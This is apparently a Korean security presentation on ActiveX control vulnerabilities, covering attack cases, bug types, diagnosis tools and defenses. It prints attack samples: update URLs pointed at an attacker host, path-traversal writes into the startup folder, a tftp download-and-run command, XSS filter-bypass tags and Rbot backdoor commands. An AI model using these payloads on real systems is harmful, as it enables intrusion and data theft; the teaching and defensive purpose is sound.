ActiveX 취약점 공격 및 방어 기법

Similar documents
인디쓔피-IOM핸돜벁닄큐1014pdf, page Preflight ( IOM핸돜벁닄큐__1014 )

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

PowerPoint 프레젠테이션

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

CONTENTS

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Secure Programming Lecture1 : Introduction

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

Copyright by Korean Local-government Management Institute. ALL RIGHTS RESERVED. No part of this publication may be reproduced, stored in a retrieval s

피해자식별PDF용 0502

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

Microsoft PowerPoint - chap01-C언어개요.pptx

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>


PowerPoint Presentation

!K_InDesginCS_NFH

BSC Discussion 1

Javascript.pages

Dialog Box 실행파일을 Web에 포함시키는 방법

게시판 스팸 실시간 차단 시스템

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

Microsoft Word - src.doc

Deok9_Exploit Technique

*2008년1월호진짜

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

한국에너지기술연구원 통합정보시스템설치방법설명서 한국에너지기술연구원 지식정보실 - 1 -

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

#WI DNS DDoS 공격악성코드분석

PowerPoint Template

Install stm32cubemx and st-link utility

<4D F736F F F696E74202D D203120C3D6B1D920C1A4BAB8BAB8C8A320C0A7C7F9B0FA20C4A7C7D8BBE7B0ED20B5BFC7E220B1E8C8ABBCAE202E707

PowerPoint Presentation

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

vm-웨어-01장


<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

마리오와 소닉 리우 올림픽™

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..

Microsoft Word - CrossSiteScripting[XSS].docx

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Observational Determinism for Concurrent Program Security

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

TTA Journal No.157_서체변경.indd

Network seminar.key

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

ActFax 4.31 Local Privilege Escalation Exploit

초보자를 위한 분산 캐시 활용 전략

ISP and CodeVisionAVR C Compiler.hwp

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

Studuino소프트웨어 설치

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

Motor Control Solution

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

MasoJava4_Dongbin.PDF

Microsoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF

Interstage5 SOAP서비스 설정 가이드

Internet Explorer 11 자동업데이트방지 사용자가이드 작성일 : Version 1.0

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

[Brochure] KOR_TunA

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일


HTML5* Web Development to the next level HTML5 ~= HTML + CSS + JS API

PCServerMgmt7

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

Windows 8에서 BioStar 1 설치하기

thesis

2 PX-8000과 RM-8000/LM-8000등의 관련 제품은 시스템의 간편한 설치와 쉬운 운영에 대한 고급 기술을 제공합니다. 또한 뛰어난 확장성으로 사용자가 요구하는 시스템을 손쉽게 구현할 수 있습니다. 메인컨트롤러인 PX-8000의 BGM입력소스를 8개의 로컬지

++11월 소비자리포트-수정

PowerPoint 프레젠테이션

Web Scraper in 30 Minutes 강철

제목 레이아웃

5th-KOR-SANGFOR NGAF(CC)

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.

Chap7.PDF

Microsoft Word - Automap3

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

<41736D6C6F D20B9AEBCADBEE7BDC42E687770>

NTD36HD Manual

행자부 G4C

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

2006_8_14 (8_17 updated) ms ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

1

1

ODS-FM1

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

미쓰리 파워포인트

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

SOFTBASE XFRAME DEVELOPMENT GUIDE SERIES HTML 연동가이드 서울특별시구로구구로 3 동한신 IT 타워 1215 호 Phone Fax Co

PS ScanW3B 제품의 장점

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

israel-내지-1-4

Transcription:

- 사례위주로살펴본 ActiveX 취약점공격및방어기법 Copyright 2004~2006 by VMCraft, Inc. No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means electronic, mechanical, photocopying, recording, or otherwise without the permission of VMCraft, Inc. 1

I. ActiveX 컨트롤취약점공격사례 ActiveX 컨트롤정의 국내 ActiveX 컨트롤현황 공격사례 -2-

ActiveX 컨트롤취약점공격사례 정의 ActiveX 컨트롤이란? 인터넷익스플로러의기능을확장하기위해 MS 가제공하는기능 자바애플릿과는달리사용자 PC 의파일, 레지스트리등의자원에접근가능하다. 문제는일반적인윈도우프로그램과는달리공격자가웹인터페이스를통해언제든지호출가능하다는것이다. <OBJECT ID="update" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-"> <PARAM NAME= nam VALUE= 12 > </OBJECT> <script> update.startupdate() </script> ActiveX 컨트롤설치화면 OBJECT tag 및 script 를이용한호출 -3-

ActiveX 컨트롤취약점공격사례 현황 국내웹사이트는 ActiveX 컨트롤을많이이용한다. ( 천만명이상이사용하는다수의컨트롤에서취약점발견 ) ActiveX 컨트롤에대한보안성검증절차가없다. 보안프로그램에서조차도취약점이발견된다. 개별회사의문제가아니라 ActiveX 취약점에대한인식과공감대형성이부족해서발생한문제 패치가힘들다. ActiveX (PC, PMS, ) 온라인게임설치프로그램 Push -4-

ActiveX 컨트롤취약점공격사례 Is your PC really safe? -5-

ActiveX 컨트롤취약점공격사례 애드웨어 / 웜배포 사례 1 2002 년이후발견되는애드웨어의상당수는 ActiveX 나 IE 의취약점이용 취약점을이용하기때문에 확인 버튼을누르지않아도자동설치 정상적인상황 취약점공격 설치여부를사용자에게묻는다. 취약점을이용해자동으로설치된다. -6-

ActiveX 컨트롤취약점공격사례 중국발해킹 사례 2 웹서버해킹후해킹툴 / 트로이목마배포 배포되는트로이목마는 IE ActiveX 컨트롤취약점을이용해자동으로 PC 에설치 웹서버해킹 숨겨진스크립트 -7-

ActiveX 컨트롤취약점공격사례 기업임직원 PC 해킹후기밀정보추출 사례 3 내부직원에게메일발송 Q&A 게시판등에글쓰기 해당글을읽는순간공격자는해당 PC 의권한획득 메일시스템이용 BOT 설치 Q&A 게시판이용 -8-

ActiveX 컨트롤취약점공격사례 2005 년인터넷뱅킹용 ActiveX 컨트롤취약점사례 사례 4 대부분의은행에서배포하는 ActiveX 컨트롤에취약점존재 인터넷뱅킹이용자수 3000 만명이상 국내대부분의 PC 가국내외해커에게해킹가능했던상황 공격자가취약점을이용해 remote shell 획득 -9-

II. 취약점유형 자동업데이트기능관련 File operation 기능관련 이외의시스템자원접근 Advanced topic Cross zone or Cross domain Buffer overflow -10-

취약점유형 유형 1 자동업데이트기능관련취약점 업데이트서버 URL 을조작해공격자의해킹툴이설치되게함 업데이트서버 URL 조작 <OBJECT ID="update" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904-4BC88E9CDE79"> </OBJECT> <script> </script> update.updateurl = "http://update.musicqup.com"; update.startupdate(); <OBJECT ID="update" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904-4BC88E9CDE79"> </OBJECT> <script> </script> update.updateurl = "http://attaccker.xxx"; update.startupdate(); -11-

취약점유형 유형 2 File read / write method 이용 File operation 기능을우회하여임의의경로에있는임의의파일을읽고쓸수있음 File File read/write method 이용 <OBJECT ID= mymusic" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904"> </OBJECT> 저장경로 c:\program files\mymusic\data\big.gif <script> Mymusic.SetBannerImage( http://muxss.co.kr/big.gif ); </script> 저장경로 c:\documents and Settings\All users\ 시작메뉴 \ 프로그램 \ 시작프로그래 \big.bat <OBJECT ID= mymusic" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904"> </OBJECT> <script> Mymusic.SetBannerImage( http://muxss.co.kr/..\..\.\documents and settings\all users\ 시작메뉴 \ 프로그램 \big.bat ); </script> -12-

취약점유형 유형 2 File read / write method 이용 ( 계속 ) 1. 2. 3. 4. 의외로 ReadFile 및 WriteFile 처럼직접적인 method 를직접제공하는 ActiveX 컨트롤도많다. MS 의 ADODB.Stream 도 cross zone 취약점과연계해로컬파일을쓸수있는기능제공 개발자가생각하지못한방식으로 method, property 를호출해우회적으로임의의파일을읽거나쓸수있는방법을찾음 파일쓰기권한을획득한경우기존파일을덮어쓰거나, c:\documents and settings\ All users\ 시작메뉴 \ 프로그램 \ 시작프로그램 폴더에파일을생성해다음번로그인때파일이자동으로실행되게할수있다. -13-

취약점유형 유형 3 이외의시스템자원접근을이용한권한획득 1. 2. 3. 4. SetRegistryValue, GetRegistryValue 등레지스트리를조작할수있는 method StartCommand 와같이특정프로세스를실행할수있는 method => StartCommand( tftp i attacker.com GET hacktool.exe c:\hacktool.exe ); => StartCommand( c:\hacktool.exe ); GetMacAddress 등시스템정보를얻을수있는 method ( MAC, HDD Serial 인증등을위한 control 에서노출되는경우가많음 ) X-internet application -14-

취약점유형 유형 4 Advanced topic zip 파일형태로설치되는경우 일반응용프로그램과함께설치되는 ActiveX 컨트롤 SSO 인증우회, Session hijacking 파일을 zip zip 등압축파일형태로다운로드 압축된파일명 : filename1.exe 압축된파일명 :..\..\..\..\documents and settings\ all users\ 시작메뉴 \ 프로그램 \ Filename1.exe -15-

취약점유형 유형 5 Cross zone or Cross domain 관련취약점 보안영역 내컴퓨터 인트라넷 인터넷 파일을 zip zip 등압축파일형태로다운로드 각보안영역별로권한이다름 내컴퓨터 영역은로컬자원에대한접근이가능 인터넷 영역에서 내컴퓨터 영역의권한으로컨트롤을호출하는것이핵심 대부분 Windows 혹은 IE 기본 ActiveX 관련된취약점 -16-

취약점유형 유형 5 Cross zone or Cross domain 관련취약점 ( 계속 ) Help Control 취약점예 (MS05-001) Help Control 생성 C:.. ntshared.chm 오픈 해당 page 에 Javascript injection 내컴퓨터영역이므로새로운프로세스실행가능 -17-

취약점유형 유형 6 Buffer overflow 유형 소스코드감사, fuzzer 를이용한방법 Method, Property 조작을통한 Buffer overflow <OBJECT ID="update" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904-4BC88E9CDE79"> <PARAM NAME= pam1 VALUE= AAAAAAAAAAAAAAAAAA AAAAA > </OBJECT> <script> </script> update.updateurl = "http://aaaaaaaaaaaaaaaaaaaaaa...aa"; update.createmenu( type:aaaaaaaaaaaaaaaaaaaaaa AAAAAAAAA ; -18-

III. 공격과정 취약점찾기 함정설치 열람 & 공격성공 백도어설치 기타함정설치방법 TIP -19-

공격과정 취약점찾기 ActiveX 컨트롤취약점을찾은후공격용스크립트를작성한다. 시현 :: InstallFile 관련취약점 <script> update_control1.installfile( "http://update.myfmgr.com:8088/data/data1.dat", "colors.dat"); </script> <script> update_control1.installfile( "http://vmcraft.com/xxxxxx/fnmgr.exe", "..\\..\\..\\..\\Documents and Settings\\All Users\\ 시작메뉴 \\ 프로그램 \\ 시작프로그램 \\r.exe"); </script> -20-

공격과정 취약점찾기 ActiveX 컨트롤취약점을찾은후공격용스크립트를작성한다. 시현 :: StartUpdate 관련취약점 <script> update_control1.updateurl = "http://update.myfmgr.com:8088/"; update_control1.startupdate(); </script> <script> update_control1.updateurl = "http://vmcraft.com/xxxxx/"; update_control1.startupdate(); </script> -21-

공격과정 이메일이용 함정설치 취약점공격용스크립트가숨겨진메일을보낸다. 무작위로수집한메일로발송 정보유출이목적인경우지정된사람에게메일발송 시현 :: 공격용스크립트가숨겨진메일발송 -22-

공격과정 열람 & 공격성공 희생자가메일을여는순간백도어프로그램이설치된다. 취약점을공격하는것이므로첨부파일등은실행할필요가없다. 스크립트는희생자에게보이지않으며, 일반적으로희생자는공격사실을모른다. 시현 :: 메일열람 -23-

공격과정 백도어실행 공격자는희생자 PC 의제어권을얻는다. PC 내의기밀자료를가져올수있다. 키로깅이가능하다. 사용자화면옅보기가가능하다. 스팸메일및다른 PC 해킹경유지로사용할수있다. 시현 :: 백도어실행 Rbot 형태 -24-

공격과정 백도어실행 설치된 Rbot 의주요명령어는다음과같다. 기능 명령어 화면캡쳐명령어실행파일검색파일전송키로깅네트워크스니핑포트스캐닝포트리다이렉션.capture screen c: 화면.bmp.cmd dir.findfile *.doc c:.get c: research top_secret.doc.keylog on.psniff on.scan 1.2.3.4 80 10.redirect 80 www.intranet.com 80-25-

공격과정 포털사이트게시판 / 카페 / 블로그이용 함정설치 불특정다수에대한공격 게시판이나블로그에스크립트를숨겨두면방문자들의 PC 권한획득가능 최근 gxxxxxpage.com 사이트에서숨겨진스크립트발견 (2006.10) 게시판 / 블로그이용 -26-

공격과정 함정설치 기업게시판이용 고객 Q&A 게시판, 커뮤너티사이트등 기업관리자를목표로한공격 기업고객을목표로한공격 ( 은행, 증권사, 카드사등 ) 기업게시판이용 -27-

공격과정 Tip Code injection 고급기법 <script> 나 <object> tag 가들어간글을쓸수없도록막아둔사이트도있다. 이경우 XSS 부분에서이용되는다양한우회기법을활용할수있다. <IFRAME src= http://attacker/exploit.html height=0 width=0> </frame> <SCRIPT> document.write( <obj + ect> </object ); </script> <IMG SRC="javascript:document.write( )"> <IMG SRC="jav ascript:document.write( )"> <LINK REL="stylesheet" HREF="http://attacker/exploit.css"> <STYLE>@import' http://attacker/exploit.css ';</STYLE> <DIV STYLE="background-image: url(&#1;javascript:document.write( ))"> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> -28-

IV. 공격시나리오 금융부문 기업부문 기타부문 -29-

공격시나리오 금융부분 직접적인금전적이익을목적으로하는공격빈도증가 해킹기술과범죄조직이결합하는것은전세계적인추세 대규모웜출현및금융시장교란가능성 현재애드웨어 / 스파이웨어기술 ActiveX 취약점을이용한자동설치 웹검색결과컨텐츠조작 Stealth 기법을이용해자신을숨김 신종트로이목마 / 웜출현가능성 피싱기법 범죄조직혹은청소년 국내에는영향이미미 -30-

공격시나리오 기업부분 산업스파이 기업내부기밀자료유출 내부의위협 기업내에서사용중인 ActiveX 컨트롤에취약점이존재하면사실상해당기업의 PC 는모두해킹가능 PMS, 안티키로거등필수보안컨트롤에서취약점발견 인트라넷, 문서관리등자체적으로만든컨트롤인더욱심각 외부의위협 임 / 직원이웹서핑중에설치한컨트롤에취약점존재 메신저, 게임, 지도서비스사이트, 언론사이트, 은행사이트등메이저사이트에서배포하는 ActiveX 컨트롤에서다수취약점발견 한 PC 가공격되면해당 PC 를숙주로해내부망침투가능 -31-

공격시나리오 기타부분 이외에현재혹은미래에발생할수있는공격 1. 게임아이템해킹 2. 중국발해킹 1. 2. 3. 파밍공격 4. 정보전쟁 3. 4. -32-

V. 취약점진단 기본분석 상세분석 Fuzzer 디버깅및디스어셈블리 -33-

취약점진단 기본분석 OLEView 를이용한 ActiveX 컨트롤기본정보수집 자사홈페이지에서배포중인 ActiveX 컨트롤확인 ( 보안담당자 ) 자신의 PC 에설치된 ActiveX 컨트롤확인 ( 사용자 ) OLEView 를이용한 TypeLib 분석 Microsoft 사홈페이지에서무료로다운로드가능 (Visual Studio, Resource kit 에도포함되어있음 ) 컨트롤의 method, property 및 help string 을볼수있음 Method 나 property 의이름을보고전체적인아키텍쳐및기능파악 업데이트기능, File operation 기능이있는지확인 -34-

취약점진단 상세분석 HTML, JavaScript, VBScript 등실제로컨트롤이호출되는과정분석 소스보기, 웹프록시, 웹디버거, DOM 분석기등이용 DOM 분석툴을이용한분석 DOM 분석툴을이용해 ActiveX 컨트롤뿐만아니라웹페이지를구성하는전체적인요소를한눈에파악하고 History 를관리한다. 소스보기등이막혀있어도원본 HTML 코드를추출할수있다. -35-

취약점진단 상세분석 HTML, JavaScript, VBScript 등실제로컨트롤이호출되는과정분석 소스보기, 웹프록시, 웹디버거, DOM 분석기등이용 웹프록시를이용한분석 웹프록시를이용하면 Request, Reponse 를모두조작할수있다. Response 에서 JavaScript 코드자체를수정하거나 <OBJECT> 의생성형태를조작하거나제어할수있다. -36-

취약점진단 상세분석 HTML, JavaScript, VBScript 등실제로컨트롤이호출되는과정분석 소스보기, 웹프록시, 웹디버거, DOM 분석기등이용 웹디버거를이용한분석 MS 의스크립트디버거나 Visual InterDev 등웹개발툴을이용한다. 실행도중각종스크립트변수를조작할수있고, Break-point 등의설정이가능하다. Object 를호출할대변수형태로전달되는경우그값을쉽게확인할수있고, 디버깅할수잇다. IE -> 인터넷옵션 -> 고급 -> 스크립트디버깅사용안함 옵션을꺼야한다. -37-

취약점진단 COMRaider Fuzzer method, propery 에무작위로값을대입해주로 BoF 형태의취약점찾음 Update, file operation 등의취약점과는달리주소값등을맞춰줘야하며, 실제공격시프로세스가오류를발생시킬확률이있다. Fuzzer 를이용한취약점진단 Fuzzer 를이용하면 BoF, Format string 등전통적인 C/C++ 취약점을쉽게찾을수있다. 확률적으로취약점이발견될수도있고, 발견되지않을수도있다. -38-

취약점진단 디버깅 / 디스어셈블 디버거, 디스어셈블러를이용해정교하게분석한다. 주로 Buffer overflow 류의 exception 을발견한후실제공격용 exploit code 를작성할때필요하다. IDA IDA Pro, WinDBG, OllyDbg 등을이용한분석 -39-

VI. 대응방안 Vendor 측대응방안 사용자측대응방안 -40-

대응방안 Vendor 소스코드수정을통한취약점 1. 취약점분석 2. 3. 보안권고안에따라소스코드수정 패치배포 -41-

대응방안 Vendor 소스코드수정을통한취약점 일반적인권고안 특정웹사이트에서만사용되는컨트롤이라면호출될수있는도메인을지정한다. UpdateURL 등은외부에서입력받는것이아니라프로그램내부에가지고있어야한다. 업데이트될파일은전자서명을한후배포하고, 업데이트시전자서명을확인해공격자의악성파일이아닌지확인한다. File operation 이수행되는컨트롤은되도록 Safe for scripting 을제거한다. 파일명등에..,../ 등비정상적인값이없는지확인한다. -42-

대응방안 사용자 ActiveX 컨트롤비활성화 추가기능관리 Windows XP Service Pack 2 인경우 ActiveX 비활성화기능을제공한다. IE -> 도구 -> 추가기능관리 기본적으로 ActiveX 나 BHO 등은비활성화상태로두고필요한경우에만활성화한다. 추가기능관리 -43-

대응방안 사용자 OS Partitioning 형태의 Virtual machine Sandbox 를이용한다. Real OS File File System System Ex) Ex) C: a.txt C: a.txt File System Network Network System System Object/Registry Object/Registry System System B L I N D Virtual OS Virtual Virtual File File System System Ex) Ex) C: a.txt C: a.txt Sync Virtual Virtual Network Network System System Virtual Virtual Object/Registry Object/Registry System System Client Secure Module Anti-Reverse Anti-Reverse Engineering Engineering En/Decryption En/Decryption Filtering System Filtering System I/O I/O I I N N T T E E R R F F A A C C E E -44-

대응방안 Virtual Machine 생성후웹서핑은 Virtual Machine 내에서수행 사용자 최악의경우해킹되어트로이목마가설치되어도가상머신내에서만권한을가지므로기밀자료유출등방어 가상머신내에서웹서핑및프로그램설치등의과정에서애드웨어에감염되어도리얼공간 ( 업무공간 ) 에는영향을주지않는다. 악성코드유입방어 Virtual Machine Real Machine -45-

대응방안 사용자 업무환경가상화예 통신사영업점, 지점등의 PC 에대한업무환경가상화 보험설계사, 투자상담사등의노트북업무환경을가상화 영업점 PC 혹은설계사노트북 업무환경가상화예 개인정보유출금지 해킹툴침입금지 업무툴 개인정보 메신저 인트라넷 업무정보 해킹툴 VPN 기업망 Virtual machine Real machine -46-

대응방안 사용자 금융어플리케이션가상화예 Secure VM 안은윈도우설치직후의깨끗한환경을제공한다. Secure VM 안의프로세스는리버스엔지니어링공격등에안전하다. 인터넷뱅킹예 -47-

대응방안 사용자 금융어플리케이션가상화예 ( 계속 ) 인터넷뱅킹, DRM, 게임등의프로세스를 SecureVM 안에서사용하면외부해킹으로부터보호받을수있다. 금융서비스등특정목표를타켓으로하는웜 / 트로이목마가유포되어도 SecureVM 안은윈도우설치직후의깨끗한상태로유지되므로최후의보루가될수있다. Secure Connect 해킹안심로그인 -48-

Demonstration -49-

Q & A 브이엠크래프트는고객의보안 향상을위해최선의노력을다하겠습니다. -50-

2024 © docsplayer.org 개인정보보호 | 약관 | 지원